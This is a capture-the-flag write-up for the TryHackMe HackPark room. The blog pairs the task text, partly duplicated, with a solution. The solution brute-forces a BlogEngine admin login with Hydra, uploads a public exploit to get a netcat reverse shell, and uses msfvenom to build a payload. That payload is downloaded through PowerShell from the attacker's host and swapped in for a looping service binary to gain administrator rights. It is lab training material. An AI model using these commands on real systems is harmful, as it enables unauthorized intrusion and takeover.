thm-hackpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called hackpark at

Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.


#1 Deploy the machine and access its web server.
#2 Whats the name of the clown displayed on the homepage?

 

[Task 2] Using Hydra to brute-force a login

Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!

Brute-forcing can be trying every combination of a password. Dictionary-attack’s are also a type of brute-forcing, where we iterating through a wordlist to obtain the password.


#1 We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web servers make two types of requests, a GET request which is used to request data from a webserver and a POST request which is used to send data to a server.

You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).

What request type is the Windows website login form using?

#2 Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

Guess a username, choose a password wordlist and gain credentials to a user account!

#3 Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).

However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more.

Below is a mini cheatsheet:

Command Description
hydra -P <wordlist> -v <ip> <protocol> Brute force against a protocol of your choice
hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol> You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip> Attack a Windows Remote Desktop with a password list.
hydra -l <username> -P .<password list> $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ Craft a more specific request for Hydra to brute force.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we’ll use good old “admin”. Here’s the Hydra command to brute-force the web form:

E:\PENTEST\thc-hydra>hydra -l admin -P rock.txt 10.10.140.111 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-03 19:49:39
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:0), ~6 try per task
[DATA] attacking http-post-form://10.10.140.111:80/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.140.111   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-03 19:49:52

E:\PENTEST\thc-hydra>
Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons — “path to the login form page : request body : error message indicating failure”

To get this information open the networks tab in the developer tools, send one login request with random credentials and inspected it by clicking “Edit and Resend”.



The request body can be found in the “Request Body” section at the bottom. Before pasting it in the terminal we need to find where the credentials are used, so hydra would know to insert it’s guessing there.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra

One last piece of information Hydra needs is a message indicating failure, so it could tell when the guessed password is correct. At login failure, the site prompts us with “Login failed”. That’s exactly the string We need.

After running Hydra and obtaining the password We can log into BlogEngine as admin 🔥

.

In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!

Exploit-Database is a CVE (common vulnerability and exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researches. It is owned by Offensive Security (who are responsible for OSCP and Kali)


#1 Now you have logged into the website, are you able to identify the version of the BlogEngine?
#2 Use the exploit database archive to find an exploit to gain a reverse shell on this system.

What is the CVE?

#3 Using the public exploit, gain initial access to the server.

Who is the webserver running as?

.

In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.


#1 Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.

If you don’t know how to do this, I suggest completing up to task 3 in our Metasploit room first!

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!

#2 You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities.

What is the OS version of this windows machine?

#3 Further enumerate the machine.

What is the name of the abnormal service running?

#4 What is the name of the binary you’re supposed to exploit?
#5 Using this abnormal service, escalate your privileges!

What is the user flag (on Jeffs Desktop)?

#6 What is the root flag?

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.


#1 Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp
#2 After generating our payload we need to pull this onto the box using powershell.

Tip: It’s common to find C:\Windows\Temp is world writable!
#3 Now you know how to pull files from your machine to the victims machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here)

WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Tip: You can execute these files by using .\filename.exe

Using winPeas, what was the Original Install time of the server ? (This is date and time) ,Found from cmd-shell with : systeminfo

Writeup :

Try it for yourself here.

Deployment and reverse image search

After the machine deployed I opened the website and got prompted by this friendly clown:

I guess most of you recognized him right off the bat as Pennywise from the Movie IT. I didn’t, so I used reverse image search to find who he is. Google didn’t provide any good output, but TinEye did.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we’ll use good old “admin”. Here’s the Hydra command to brute-force the web form:

Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons — “path to the login form page : request body : error message indicating failure”

To get this information open the networks tab in the developer tools, send one login request with random credentials and inspected it by clicking “Edit and Resend”.

The request body can be found in the “Request Body” section at the bottom. Before pasting it in the terminal we need to find where the credentials are used, so hydra would know to insert it’s guessing there.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra

One last piece of information Hydra needs is a message indicating failure, so it could tell when the guessed password is correct. At login failure, the site prompts us with “Login failed”. That’s exactly the string We need.

After running Hydra and obtaining the password We can log into BlogEngine as admin 🔥

Compromise the machine

The first thing to be done is to check the version of BlogEngine. It can be found in the “About” tab. A quick google search of this version revealed this exploit in exploit-db.

Example search for an exploit with the “searchsploit” command on Kali Linux. We’ll use the fourth result.

Inside the exploit, a comment specified exactly what we needed to do to get this running. Firstly change the address and port of the attacker to yours.

Rename the exploit to PostView.ascx. It should be uploaded via editing a post:

To upload the file edit the only post on the website and click the folder icon marked above

To get the reverse shell we only need to start a Netcat listener and navigate to http://10.10.147.54/?theme=../../App_Data/files

There is nothing prettier than getting a reverse shell

By running whoami we see that the server is running as “iis apppool\blog”.

Privilege Escalation [without Metasploit]

Before scanning the machine to find a way to escalate privileges, Let’s get a stable shell. We will create a reverse shell executable with msfvenom:

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=[your_ip] LPORT=[listening_port] -f exe -o [shell_name.exe]

Now the payload is ready. Start a small server so the machine would be able to download the executable with python3 -m http.server.

We don’t have write permissions to the current folder, so before downloading navigate to C:\Windows\Temp. To download use this command:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://[your_ip]:[listening_port]/[shell_name.exe]')"

amazing. Now listen on the port you specified previously and run the executable.

A stable reverse shell

The same way we sent this reverse shell we can send an enumeration script. I used winPEAS.

Analyzing the results of the enumeration took a while. Under the “Running Processes” section exists a service name “Message.exe”. Further inspection shows that it keeps on running and stopping repeatedly. If we can replace Message.exe with our reverse shell script we can get a shell with higher privileges.

Message.exe can be found under C:\Program Files (x86)\SystemScheduler. Rename Message.exe to Message.bak, send your shell and rename it to Message.exe. Don’t forget to listen on the port you specified!

Wait for a little, and voila! we have a shell. running whoami returns:

These permissions are enough to access both “jeff” and “Administrator” that hold the user and root flags.

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *